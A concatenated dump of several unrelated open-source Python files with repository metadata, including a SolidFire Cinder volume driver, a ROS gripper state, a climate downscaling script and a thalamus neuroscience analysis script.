data = self._issue_api_request('DeleteVolume', params)
if 'result' not in data:
msg = _("Failed to delete SolidFire Volume: %s") % data
raise exception.SolidFireAPIException(msg)
else:
LOG.error(_LE("Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"delete_volume operation!"), volume['id'])
def delete_snapshot(self, snapshot):
"""Delete the specified snapshot from the SolidFire cluster."""
sf_snap_name = 'UUID-%s' % snapshot['id']
accounts = self._get_sfaccounts_for_tenant(snapshot['project_id'])
snap = None
for a in accounts:
params = {'accountID': a['accountID']}
sf_vol = self._get_sf_volume(snapshot['volume_id'], params)
sf_snaps = self._get_sf_snapshots(sf_vol['volumeID'])
snap = next((s for s in sf_snaps if s["name"] == sf_snap_name),
None)
if snap:
params = {'snapshotID': snap['snapshotID']}
data = self._issue_api_request('DeleteSnapshot',
params,
version='6.0')
if 'result' not in data:
msg = (_("Failed to delete SolidFire Snapshot: %s") %
data)
raise exception.SolidFireAPIException(msg)
return
# Make sure it's not "old style" using clones as snaps
LOG.debug("Snapshot not found, checking old style clones.")
self.delete_volume(snapshot)
def create_snapshot(self, snapshot):
sfaccount = self._get_sfaccount(snapshot['project_id'])
if sfaccount is None:
LOG.error(_LE("Account for Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"create_snapshot operation!"), snapshot['volume_id'])
params = {'accountID': sfaccount['accountID']}
sf_vol = self._get_sf_volume(snapshot['volume_id'], params)
if sf_vol is None:
raise exception.VolumeNotFound(volume_id=snapshot['volume_id'])
params = {'volumeID': sf_vol['volumeID'],
'name': 'UUID-%s' % snapshot['id']}
self._do_snapshot_create(params)
def create_volume_from_snapshot(self, volume, snapshot):
"""Create a volume from the specified snapshot."""
(_data, _sfaccount, model) = self._do_clone_volume(
snapshot['id'],
snapshot['project_id'],
volume)
return model
def get_volume_stats(self, refresh=False):
"""Get volume status.
If 'refresh' is True, run update first.
The name is a bit misleading as
the majority of the data here is cluster
data
"""
if refresh:
try:
self._update_cluster_status()
except exception.SolidFireAPIException:
pass
return self.cluster_stats
def extend_volume(self, volume, new_size):
"""Extend an existing volume."""
sfaccount = self._get_sfaccount(volume['project_id'])
params = {'accountID': sfaccount['accountID']}
sf_vol = self._get_sf_volume(volume['id'], params)
if sf_vol is None:
LOG.error(_LE("Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"extend_volume operation!"), volume['id'])
raise exception.VolumeNotFound(volume_id=volume['id'])
params = {
'volumeID': sf_vol['volumeID'],
'totalSize': int(new_size * units.Gi)
}
data = self._issue_api_request('ModifyVolume',
params, version='5.0')
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
def _update_cluster_status(self):
"""Retrieve status info for the Cluster."""
params = {}
# NOTE(jdg): The SF api provides an UNBELIEVABLE amount
# of stats data, this is just one of the calls
results = self._issue_api_request('GetClusterCapacity', params)
if 'result' not in results:
LOG.error(_LE('Failed to get updated stats'))
results = results['result']['clusterCapacity']
free_capacity = (
results['maxProvisionedSpace'] - results['usedSpace'])
data = {}
backend_name = self.configuration.safe_get('volume_backend_name')
data["volume_backend_name"] = backend_name or self.__class__.__name__
data["vendor_name"] = 'SolidFire Inc'
data["driver_version"] = self.VERSION
data["storage_protocol"] = 'iSCSI'
data['total_capacity_gb'] = (
float(results['maxProvisionedSpace'] / units.Gi))
data['free_capacity_gb'] = float(free_capacity / units.Gi)
data['reserved_percentage'] = self.configuration.reserved_percentage
data['QoS_support'] = True
data['compression_percent'] = (
results['compressionPercent'])
data['deduplicaton_percent'] = (
results['deDuplicationPercent'])
data['thin_provision_percent'] = (
results['thinProvisioningPercent'])
self.cluster_stats = data
def attach_volume(self, context, volume,
instance_uuid, host_name,
mountpoint):
sfaccount = self._get_sfaccount(volume['project_id'])
params = {'accountID': sfaccount['accountID']}
sf_vol = self._get_sf_volume(volume['id'], params)
if sf_vol is None:
LOG.error(_LE("Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"attach_volume operation!"), volume['id'])
raise exception.VolumeNotFound(volume_id=volume['id'])
attributes = sf_vol['attributes']
attributes['attach_time'] = volume.get('attach_time', None)
attributes['attached_to'] = instance_uuid
params = {
'volumeID': sf_vol['volumeID'],
'attributes': attributes
}
data = self._issue_api_request('ModifyVolume', params)
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
def detach_volume(self, context, volume, attachment=None):
sfaccount = self._get_sfaccount(volume['project_id'])
params = {'accountID': sfaccount['accountID']}
sf_vol = self._get_sf_volume(volume['id'], params)
if sf_vol is None:
LOG.error(_LE("Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"detach_volume operation!"), volume['id'])
raise exception.VolumeNotFound(volume_id=volume['id'])
attributes = sf_vol['attributes']
attributes['attach_time'] = None
attributes['attached_to'] = None
params = {
'volumeID': sf_vol['volumeID'],
'attributes': attributes
}
data = self._issue_api_request('ModifyVolume', params)
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
def accept_transfer(self, context, volume,
new_user, new_project):
sfaccount = self._get_sfaccount(volume['project_id'])
params = {'accountID': sfaccount['accountID']}
sf_vol = self._get_sf_volume(volume['id'], params)
if sf_vol is None:
LOG.error(_LE("Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"accept_transfer operation!"), volume['id'])
raise exception.VolumeNotFound(volume_id=volume['id'])
if new_project != volume['project_id']:
# do a create_sfaccount here as this tenant
# may not exist on the cluster yet
sfaccount = self._create_sfaccount(new_project)
params = {
'volumeID': sf_vol['volumeID'],
'accountID': sfaccount['accountID']
}
data = self._issue_api_request('ModifyVolume',
params, version='5.0')
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
volume['project_id'] = new_project
volume['user_id'] = new_user
return self.target_driver.ensure_export(context, volume, None)
def retype(self, ctxt, volume, new_type, diff, host):
"""Convert the volume to be of the new type.
Returns a boolean indicating whether the retype occurred.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param new_type: A dictionary describing the volume type to convert to
:param diff: A dictionary with the difference between the two types
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities (Not Used).
"""
qos = {}
attributes = {}
sfaccount = self._get_sfaccount(volume['project_id'])
params = {'accountID': sfaccount['accountID']}
sf_vol = self._get_sf_volume(volume['id'], params)
if sf_vol is None:
raise exception.VolumeNotFound(volume_id=volume['id'])
attributes = sf_vol['attributes']
attributes['retyped_at'] = timeutils.utcnow().isoformat()
params = {'volumeID': sf_vol['volumeID']}
qos = self._set_qos_by_volume_type(ctxt, new_type['id'])
if qos:
params['qos'] = qos
for k, v in qos.items():
attributes[k] = str(v)
params['attributes'] = attributes
self._issue_api_request('ModifyVolume', params)
return True
def manage_existing(self, volume, external_ref):
"""Manages an existing SolidFire Volume (import to Cinder).
Renames the Volume to match the expected name for the volume.
Also need to consider things like QoS, Emulation, account/tenant.
"""
sfid = external_ref.get('source-id', None)
sfname = external_ref.get('name', None)
if sfid is None:
raise exception.SolidFireAPIException(_("Manage existing volume "
"requires 'source-id'."))
# First get the volume on the SF cluster (MUST be active)
params = {'startVolumeID': sfid,
'limit': 1}
data = self._issue_api_request('ListActiveVolumes', params)
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
sf_ref = data['result']['volumes'][0]
sfaccount = self._create_sfaccount(volume['project_id'])
attributes = {}
qos = {}
if (self.configuration.sf_allow_tenant_qos and
                volume.get('volume_metadata') is not None):
qos = self._set_qos_presets(volume)
ctxt = context.get_admin_context()
type_id = volume.get('volume_type_id', None)
if type_id is not None:
qos = self._set_qos_by_volume_type(ctxt, type_id)
import_time = volume['created_at'].isoformat()
attributes = {'uuid': volume['id'],
'is_clone': 'False',
'os_imported_at': import_time,
'old_name': sfname}
if qos:
for k, v in qos.items():
attributes[k] = str(v)
params = {'name': volume['name'],
'volumeID': sf_ref['volumeID'],
'accountID': sfaccount['accountID'],
'enable512e': self.configuration.sf_emulate_512,
'attributes': attributes,
'qos': qos}
data = self._issue_api_request('ModifyVolume',
params, version='5.0')
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
return self._get_model_info(sfaccount, sf_ref['volumeID'])
def manage_existing_get_size(self, volume, external_ref):
"""Return size of an existing LV for manage_existing.
existing_ref is a dictionary of the form:
{'name': <name of existing volume on SF Cluster>}
"""
sfid = external_ref.get('source-id', None)
if sfid is None:
raise exception.SolidFireAPIException(_("Manage existing get size "
"requires 'id'."))
params = {'startVolumeID': int(sfid),
'limit': 1}
data = self._issue_api_request('ListActiveVolumes', params)
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
sf_ref = data['result']['volumes'][0]
return int(sf_ref['totalSize']) / int(units.Gi)
def unmanage(self, volume):
"""Mark SolidFire Volume as unmanaged (export from Cinder)."""
sfaccount = self._get_sfaccount(volume['project_id'])
if sfaccount is None:
LOG.error(_LE("Account for Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"unmanage operation!"), volume['id'])
raise exception.SolidFireAPIException(_("Failed to find account "
"for volume."))
params = {'accountID': sfaccount['accountID']}
sf_vol = self._get_sf_volume(volume['id'], params)
if sf_vol is None:
raise exception.VolumeNotFound(volume_id=volume['id'])
export_time = timeutils.utcnow().isoformat()
attributes = sf_vol['attributes']
attributes['os_exported_at'] = export_time
params = {'volumeID': int(sf_vol['volumeID']),
'attributes': attributes}
data = self._issue_api_request('ModifyVolume',
params, version='5.0')
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
# #### Interface methods for transport layer #### #
# TODO(jdg): SolidFire can mix and do iSCSI and FC on the
# same cluster, we'll modify these later to check based on
# the volume info if we need an FC target driver or an
# iSCSI target driver
def ensure_export(self, context, volume):
return self.target_driver.ensure_export(context, volume, None)
def create_export(self, context, volume, connector):
return self.target_driver.create_export(
context,
volume,
None)
def remove_export(self, context, volume):
return self.target_driver.remove_export(context, volume)
def initialize_connection(self, volume, connector):
return self.target_driver.initialize_connection(volume, connector)
def validate_connector(self, connector):
return self.target_driver.validate_connector(connector)
def terminate_connection(self, volume, connector, **kwargs):
return self.target_driver.terminate_connection(volume, connector,
**kwargs)
class SolidFireISCSI(iscsi_driver.SanISCSITarget):
def __init__(self, *args, **kwargs):
super(SolidFireISCSI, self).__init__(*args, **kwargs)
self.sf_driver = kwargs.get('solidfire_driver')
def _do_iscsi_export(self, volume):
sfaccount = self.sf_driver._get_sfaccount(volume['project_id'])
model_update = {}
model_update['provider_auth'] = ('CHAP %s %s'
% (sfaccount['username'],
sfaccount['targetSecret']))
return model_update
def create_export(self, context, volume, volume_path):
return self._do_iscsi_export(volume)
def ensure_export(self, context, volume, volume_path):
try:
return self._do_iscsi_export(volume)
except exception.SolidFireAPIException:
return None
# Following are abc's that we make sure are caught and
# paid attention to. In our case we don't use them
# so just stub them out here.
def remove_export(self, context, volume):
pass
def terminate_connection(self, volume, connector, **kwargs):
pass
|
apache-2.0
| -2,846,976,939,667,799,600 | 39.789269 | 79 | 0.551196 | false |
amasiero/approach_control
|
approach_control_manipulator/nodes/approach_control_manipulator/OpenGripper.py
|
1
|
1219
|
#!/usr/bin/env python
import rospy
import smach
import numpy as np
from std_msgs.msg import Float64
from dynamixel_msgs.msg import JointState
class OpenGripper(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes = ['success', 'in_progress', 'fail'])
self.joint4 = rospy.Publisher('/tilt6_controller/command', Float64, queue_size = 10)
self.count = 0
self.error_default = 0.04
self.pos = 0
self.error = 0
rospy.Rate(5)
def callback(self, data):
self.pos = data.current_pos
self.error = data.error
def execute(self, userdata):
rospy.loginfo('Opening Gripper')
rospy.sleep(0.1)
rospy.Subscriber('/tilt6_controller/state', JointState, self.callback)
self.joint4.publish(2.61)
rospy.sleep(4)
rospy.loginfo('Position: %f', np.round(self.pos, 2))
rospy.loginfo('Error: %f', np.absolute(self.error))
if np.absolute(self.error) < self.error_default:
rospy.loginfo('Gripper open')
return 'success'
elif self.count < 1:
self.count += 1
return 'in_progress'
else:
return 'fail'
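# Editorial usage sketch (hedged): how this state is typically wired into a
# SMACH state machine; the node name, container and transitions below are
# illustrative and not part of the original node.
#
#   rospy.init_node('open_gripper_sm')
#   sm = smach.StateMachine(outcomes=['done', 'aborted'])
#   with sm:
#       smach.StateMachine.add('OPEN_GRIPPER', OpenGripper(),
#                              transitions={'success': 'done',
#                                           'in_progress': 'OPEN_GRIPPER',
#                                           'fail': 'aborted'})
#   sm.execute()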
|
gpl-2.0
| 2,137,452,575,474,509,000 | 26.111111 | 92 | 0.59557 | false |
DayGitH/Python-Challenges
|
DailyProgrammer/DP20140702B.py
|
1
|
2885
|
"""
[7/2/2014] Challenge #169 [Intermediate] Home-row Spell Check
https://www.reddit.com/r/dailyprogrammer/comments/29od55/722014_challenge_169_intermediate_homerow_spell/
#User Challenge:
Thanks to /u/Fruglemonkey. This is from our idea subreddit.
http://www.reddit.com/r/dailyprogrammer_ideas/comments/26pak5/intermediate_homerow_spell_check/
#Description:
Aliens from Mars have finally found a way to contact Earth! After many years studying our computers, they've finally
created their own computer and keyboard to send us messages. Unfortunately, because they're new to typing, they often
put their fingers slightly off in the home row, sending us garbled messages! Otherwise, these martians have impeccable
spelling. You are tasked to create a spell-checking system that recognizes words that have been typed off-center in the
home row, and replaces them with possible outcomes.
#Formal Input:
You will receive a string that may have one or more 'mis-typed' words in them. Each mis-typed word has been shifted as
if the hands typing them were offset by 1 or 2 places on a QWERTY keyboard.
Words wrap based on the physical line of a QWERTY keyboard. So A left shift of 1 on Q becomes P. A right shift of L
becomes A.
#Formal Output:
The correct string, with corrected words displayed in curly brackets. If more than one word is possible for a
misspelling, then display all possible words.
#Sample Input:
The quick ntpem fox jumped over rgw lazy dog.
#Sample Output:
The quick {brown} fox jumped over {the} lazy dog.
#Challenge Input:
Gwkki we are hyptzgsi martians rt zubq in qrsvr.
#Challenge Input Solution:
{Hello} we are {friendly} martians {we} {come} in {peace}
#Alternate Challenge Input:
A oweaib who fprd not zfqzh challenges should mt ewlst to kze
#Alternate Challenge Output:
A {person} who {does} not {check} challenges should {be} {ready} to {act}
#Dictionary:
Good to have a source of words. Some suggestions.
* [enable1.txt] (https://code.google.com/p/dotnetperls-controls/downloads/detail?name=enable1.txt)
* [British English Word List] (http://www.curlewcommunications.co.uk/wordlist.html)
#FAQ:
As you can imagine I did not proof-read this. So let's clear it up.
Shifts can be 1 to 2 spots away. The above only says "1" -- it looks like it can be 1-2, so let's just assume it can be
1-2 away.
If you shift 1 Left on a Q - A - Z you get a P L M -- so it will wrap on the same "Row" of your QWERTY keyboard.
If you shift 2 Left on a W - S - X you get P L M.
If you Shift 1 Right on P L M -- you get Q A Z. If you shift 2 right on O K N - you get Q A Z.
The shift is only on A-Z keys. We will ignore others.
enable1.txt has "si" as a valid word. Delete that word from the dictionary to make it work.
I will be double checking the challenge input - I will post an alternate one as well.
"""
def main():
pass
if __name__ == "__main__":
main()
|
mit
| -7,657,910,540,772,636,000 | 49.614035 | 119 | 0.754939 | false |
weaverch/super8scan
|
Scripts/Capture/super8scan/__init__.py
|
1
|
2102
|
###################################################################
# This file is a modification of the file "__init__.py" from the #
# RPi Telecine project. I've included that project's header and #
# copyright below. #
###################################################################
# RPi Telecine Library package
#
#
# Copyright (c) 2015, Jason Lane
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Configuration handling
from super8scan.config import (
s8sConfig,
)
from super8scan.camera import (
s8sCamera,
)
from super8scan.perforation import (
s8sPerforation,
)
|
bsd-3-clause
| -6,091,237,985,187,468,000 | 41.04 | 83 | 0.696004 | false |
ua-snap/downscale
|
snap_scripts/downscaling_L48/downscale_cmip5_L48.py
|
1
|
6512
|
# downscale the prepped cmip5 data used in running the TEM model (IEM)
# author: Michael Lindgren
if __name__ == '__main__':
import glob, os, rasterio, itertools
from functools import partial
import downscale
from downscale import preprocess
import numpy as np
import argparse
# # parse the commandline arguments
parser = argparse.ArgumentParser( description='downscale the AR5-CMIP5 data to the AKCAN extent required by SNAP' )
parser.add_argument( "-b", "--base_dir", action='store', dest='base_dir', type=str, help="base directory where data is stored in structured folders" )
parser.add_argument( "-m", "--model", action='store', dest='model', type=str, help="cmip5 model name (exact)" )
parser.add_argument( "-v", "--variable", action='store', dest='variable', type=str, help="cmip5 variable name (exact)" )
parser.add_argument( "-s", "--scenario", action='store', dest='scenario', type=str, help="cmip5 scenario name (exact)" )
parser.add_argument( "-u", "--units", action='store', dest='units', type=str, help="cmip5 units name (exact)" )
parser.add_argument( "-met", "--metric", action='store', dest='metric', type=str, help="cmip5 metric name (exact)" )
parser.add_argument( "-lev", "--level", action='store', dest='level', type=int, help="optional level to extract for downscaling" )
parser.add_argument( "-levn", "--level_name", action='store', dest='level_name', type=str, help="name of level variable" )
args = parser.parse_args()
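	# Example invocation (illustrative values only, mirroring the testing block
	# further below; adjust paths and names for your own run):
	#   python downscale_cmip5_L48.py -b /workspace/Shared/Tech_Projects/DeltaDownscaling/project_data \
	#          -m GFDL-CM3 -v clt -s historical -u pct -met mean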
# unpack the args
variable = args.variable
scenario = args.scenario
model = args.model
units = args.units
metric = args.metric
base_dir = args.base_dir
level = args.level
level_name = args.level_name
if level is not None:
level = float( level )
# hardwired ARGS -- CMIP5
project = 'ar5'
interp = False
find_bounds = False
fix_clim = False
aoi_mask = None # for precip data only
anom = True # write out anoms (True) or not (False)
# # # FOR TESTING # # #
# base_dir = '/workspace/Shared/Tech_Projects/DeltaDownscaling/project_data'
# variable = 'clt'
# scenario = 'historical'
# model = 'GFDL-CM3'
# units = 'pct'
# metric = 'mean'
# level_name = None
# level = None
# # level = 1000 # mb / Pa
# # level_name = 'plev'
# # if level is not None:
# # level = float( level )
# # # # # # END TESTING # # #
# some setup args
base_path = os.path.join( base_dir,'cmip5','prepped' )
output_dir = os.path.join( base_dir, 'insolation_L48', 'downscaled_L48' )
variables = [ variable ]
scenarios = [ scenario ]
models = [ model ]
	# modelnames maps each model name used to query the files (the `models` list variable)
	# to the string to put in the output filenames, in case the two differ
all_models = [ 'IPSL-CM5A-LR', 'MRI-CGCM3', 'GISS-E2-R', 'GFDL-CM3', 'CCSM4' ] # temp for distributed run
modelnames = [ 'IPSL-CM5A-LR', 'MRI-CGCM3', 'GISS-E2-R', 'GFDL-CM3', 'NCAR-CCSM4' ]
modelnames = dict( zip( all_models, modelnames ) )
if not os.path.exists( output_dir ):
os.makedirs( output_dir )
os.chdir( output_dir )
for variable, model, scenario in itertools.product( variables, models, scenarios ):
modelname = modelnames[ model ]
# SETUP BASELINE
cru_cl20_varnames = {'hur':'reh', 'clt':'clt'} # we only support these variables for now...
clim_path = os.path.join( base_dir, 'insolation_L48', 'climatologies', cru_cl20_varnames[variable] )
filelist = glob.glob( os.path.join( clim_path, '*.tif' ) )
filelist = [ i for i in filelist if '_14_' not in i ] # remove the GD ANNUAL _14_ file.
baseline = downscale.Baseline( filelist )
input_path = os.path.join( base_path, model, scenario, variable )
output_path = os.path.join( output_dir, model, scenario, variable )
if not os.path.exists( output_path ):
os.makedirs( output_path )
print( input_path )
# list files for this set of downscaling -- one per folder
fn, = glob.glob( os.path.join( input_path, '*.nc' ) )
if 'historical' in scenario:
historical = downscale.Dataset( fn, variable, model, scenario, project=project, units=units,
metric=metric, begin=1900, end=2005, level_name=level_name, level=level )
future = None
else:
# get the historical data for anomalies
historical_fn, = glob.glob( os.path.join( os.path.dirname( fn ).replace( scenario, 'historical' ), '*.nc' ) )
historical = downscale.Dataset( historical_fn, variable, model, scenario, project=project, units=units,
metric=metric, begin=1900, end=2005, level_name=level_name, level=level )
future = downscale.Dataset( fn, variable, model, scenario, project=project, units=units, metric=metric,
begin=2006, end=2100, level_name=level_name, level=level )
		# convert from Kelvin to Celsius
if variable == 'tas':
if historical:
historical.ds[ variable ] = historical.ds[ variable ] - 273.15
historical.ds[ variable ][ 'units' ] = units
if future:
future.ds[ variable ] = future.ds[ variable ] - 273.15
future.ds[ variable ][ 'units' ] = units
# DOWNSCALE
mask = rasterio.open( baseline.filelist[0] ).read_masks( 1 )
clim_begin = '1961'
clim_end = '1990'
if variable == 'pr':
rounder = np.rint
downscaling_operation = 'mult'
elif variable in ['hur','cld','clt']:
rounder = partial( np.round, decimals=1 )
downscaling_operation = 'mult'
else:
rounder = partial( np.round, decimals=1 )
downscaling_operation = 'add'
def round_it( x, mask ):
arr = np.ma.masked_array( data=x, mask=mask )
return rounder( arr )
round_data = partial( round_it, mask=( mask==0 ) )
def round_data_clamp_hur( x ):
x = round_data( x )
x[ x < 0.0 ] = 0.0
x[ x > 100.0 ] = 95.0 # per Stephanie McAfee
return x
def round_data_clamp_clt( x ):
x = round_data( x )
x[ x < 0.0 ] = 0.0
x[ x > 100.0 ] = 100.0 # per Stephanie McAfee
return x
if variable == 'hur':
post_downscale_function = round_data_clamp_hur
elif variable == 'clt':
post_downscale_function = round_data_clamp_clt
else:
post_downscale_function = round_data
ar5 = downscale.DeltaDownscale( baseline, clim_begin, clim_end, historical, future,
downscaling_operation=downscaling_operation, mask=mask, mask_value=0, ncpus=64,
src_crs={'init':'epsg:4326'}, src_nodata=None, dst_nodata=None,
post_downscale_function=post_downscale_function, varname=variable, modelname=modelname,
anom=anom, interp=interp, find_bounds=find_bounds, fix_clim=fix_clim, aoi_mask=aoi_mask )
ar5.downscale( output_dir=output_path )
|
mit
| -4,572,493,743,222,169,000 | 37.311765 | 151 | 0.670147 | false |
gviejo/ThalamusPhysio
|
python/main_make_MAPinfo.py
|
1
|
14284
|
#!/usr/bin/env python
'''
File name: main_make_MAPinfo.py
Author: Guillaume Viejo
Date created: 09/10/2017
Python Version: 3.5.2
To make shank mapping
'''
import numpy as np
import pandas as pd
# from matplotlib.pyplot import plot,show,draw
import scipy.io
from functions import *
from pylab import *
from sklearn.decomposition import PCA
import _pickle as cPickle
import neuroseries as nts
import sys
sys.exit()
###############################################################################################################
# LOADING DATA
###############################################################################################################
data_directory = '/mnt/DataGuillaume/MergedData/'
datasets = np.loadtxt(data_directory+'datasets_ThalHpc.list', delimiter = '\n', dtype = str, comments = '#')
theta_mod, theta_ses = loadThetaMod('/mnt/DataGuillaume/MergedData/THETA_THAL_mod.pickle', datasets, return_index=True)
swr_mod, swr_ses = loadSWRMod('/mnt/DataGuillaume/MergedData/SWR_THAL_corr.pickle', datasets, return_index=True)
spind_mod, spind_ses = loadSpindMod('/mnt/DataGuillaume/MergedData/SPINDLE_mod.pickle', datasets, return_index=True)
spike_spindle_phase = cPickle.load(open('/mnt/DataGuillaume/MergedData/SPIKE_SPINDLE_PHASE.pickle', 'rb'))
spike_theta_phase = cPickle.load(open('/mnt/DataGuillaume/MergedData/SPIKE_THETA_PHASE.pickle', 'rb'))
nbins = 400
binsize = 5
times = np.arange(0, binsize*(nbins+1), binsize) - (nbins*binsize)/2
theta = pd.DataFrame( index = theta_ses['rem'],
columns = ['phase', 'pvalue', 'kappa'],
data = theta_mod['rem'])
# filtering swr_mod
swr = pd.DataFrame( columns = swr_ses,
index = times,
data = gaussFilt(swr_mod, (10,)).transpose())
# Cut swr_mod from -500 to 500
swr = swr.loc[-500:500]
# CHECK FOR NAN
tmp1 = swr.columns[swr.isnull().any()].values
tmp2 = theta.index[theta.isnull().any(1)].values
# CHECK P-VALUE
tmp3 = theta.index[(theta['pvalue'] > 1).values].values
tmp = np.unique(np.concatenate([tmp1,tmp2,tmp3]))
# copy and delete
if len(tmp):
swr_modth = swr.drop(tmp, axis = 1)
theta_modth = theta.drop(tmp, axis = 0)
swr_modth_copy = swr_modth.copy()
neuron_index = swr_modth.columns
times = swr_modth.loc[-500:500].index.values
###############################################################################################################
# MOVIE + jPCA for each animal
###############################################################################################################
mouses = ['Mouse12', 'Mouse17', 'Mouse20', 'Mouse32']
# times = np.arange(0, 1005, 5) - 500 # BAD
interval_to_cut = { 'Mouse12':[89,128],
'Mouse17':[84,123],
'Mouse20':[92,131],
'Mouse32':[80,125]}
movies = dict.fromkeys(mouses)
rXX = dict.fromkeys(mouses)
maps = dict.fromkeys(mouses)
headdir = dict.fromkeys(mouses)
adnloc = dict.fromkeys(mouses)
xpos = dict.fromkeys(mouses)
ypos = dict.fromkeys(mouses)
xpos_shank = dict.fromkeys(mouses)
ypos_shank = dict.fromkeys(mouses)
xpos_phase = dict.fromkeys(mouses)
ypos_phase = dict.fromkeys(mouses)
theta_dens = dict.fromkeys(mouses)
hd_neurons_index = []
for m in mouses:
print(m)
depth = pd.DataFrame(index = np.genfromtxt(data_directory+m+"/"+m+".depth", dtype = 'str', usecols = 0),
data = np.genfromtxt(data_directory+m+"/"+m+".depth", usecols = 1),
columns = ['depth'])
neurons = np.array([n for n in neuron_index if m in n])
sessions = np.unique([n.split("_")[0] for n in neuron_index if m in n])
nb_bins = 201
swr_shank = np.zeros((len(sessions),8,nb_bins))
# nb_bins = interval_to_cut[m][1] - interval_to_cut[m][0]
theta_shank = np.zeros((len(sessions),8,30)) # that's radian bins here
spindle_shank = np.zeros((len(sessions),8,30)) # that's radian bins here
bins_phase = np.linspace(0.0, 2*np.pi+0.00001, 31)
count_total = np.zeros((len(sessions),8))
hd_neurons = np.zeros((len(sessions),8))
amplitute = np.zeros((len(sessions),8))
mod_theta = np.zeros((len(sessions),8))
###########################################################################################################
# JPCA
###########################################################################################################
rX,phi_swr,dynamical_system = jPCA(swr_modth[neurons].values.transpose(), times)
phi_swr = pd.DataFrame(index = neurons, data = phi_swr)
###########################################################################################################
# VARIOUS
###########################################################################################################
for s in sessions:
generalinfo = scipy.io.loadmat(data_directory+m+"/"+s+'/Analysis/GeneralInfo.mat')
shankStructure = loadShankStructure(generalinfo)
spikes,shank = loadSpikeData(data_directory+m+"/"+s+'/Analysis/SpikeData.mat', shankStructure['thalamus'])
hd_info = scipy.io.loadmat(data_directory+m+'/'+s+'/Analysis/HDCells.mat')['hdCellStats'][:,-1]
hd_info_neuron = np.array([hd_info[n] for n in spikes.keys()])
shankIndex = np.array([shank[n] for n in spikes.keys()]).flatten()
if np.max(shankIndex) > 8 : sys.exit("Invalid shank index for thalamus" + s)
shank_to_neurons = {k:np.array(list(spikes.keys()))[shankIndex == k] for k in np.unique(shankIndex)}
for k in shank_to_neurons.keys():
count_total[np.where(sessions== s)[0][0],k] = len(shank_to_neurons[k])
hd_neurons[np.where(sessions== s)[0][0],k] = np.sum(hd_info_neuron[shankIndex == k])
mod_theta[np.where(sessions== s)[0][0],k] = (theta.loc[[s+'_'+str(i) for i in shank_to_neurons[k]]]['pvalue'] < 0.05).sum()
# amplitute[np.where(sessions==s)[0][0],k] = (swr.loc[shank_to_neurons[k]].var(1)).mean()
###########################################################################################################
# SWR MOD
###########################################################################################################
neurons_mod_in_s = np.array([n for n in neurons if s in n])
shank_to_neurons = {k:np.array([n for n in neurons_mod_in_s if shankIndex[int(n.split("_")[1])] == k]) for k in np.unique(shankIndex)}
for k in shank_to_neurons.keys():
# if np.sum(hd_info_neuron[[int(n.split("_")[1]) for n in shank_to_neurons[k]]]):
# print(s, k, len(shank_to_neurons[k]))
# if s == 'Mouse17-130204': sys.exit()
if len(shank_to_neurons[k]):
swr_shank[np.where(sessions== s)[0][0],k] = swr_modth[shank_to_neurons[k]].mean(1).values
###########################################################################################################
# THETA MOD
###########################################################################################################
for k in shank_to_neurons.keys():
if len(shank_to_neurons[k]):
for n in shank_to_neurons[k]:
phi = spike_theta_phase['rem'][n]
phi[phi<0.0] += 2*np.pi
index = np.digitize(phi, bins_phase)-1
for t in index:
theta_shank[np.where(sessions == s)[0][0],k,t] += 1.0
###########################################################################################################
# SPIND HPC MOD
###########################################################################################################
for k in shank_to_neurons.keys():
if len(shank_to_neurons[k]):
for n in shank_to_neurons[k]:
if n in list(spike_spindle_phase.keys()):
phi = spike_spindle_phase['hpc'][n]
phi[phi<0.0] += 2*np.pi
index = np.digitize(phi, bins_phase)-1
for t in index:
spindle_shank[np.where(sessions == s)[0][0],k,t] += 1.0
for t in range(len(times)):
swr_shank[:,:,t] = np.flip(swr_shank[:,:,t], 1)
for t in range(theta_shank.shape[-1]):
theta_shank[:,:,t] = np.flip(theta_shank[:,:,t], 1)
spindle_shank[:,:,t] = np.flip(spindle_shank[:,:,t], 1)
# saving
movies[m] = { 'swr' : swr_shank ,
'theta' : theta_shank ,
'spindle': spindle_shank }
hd_neurons = hd_neurons/(count_total+1.0)
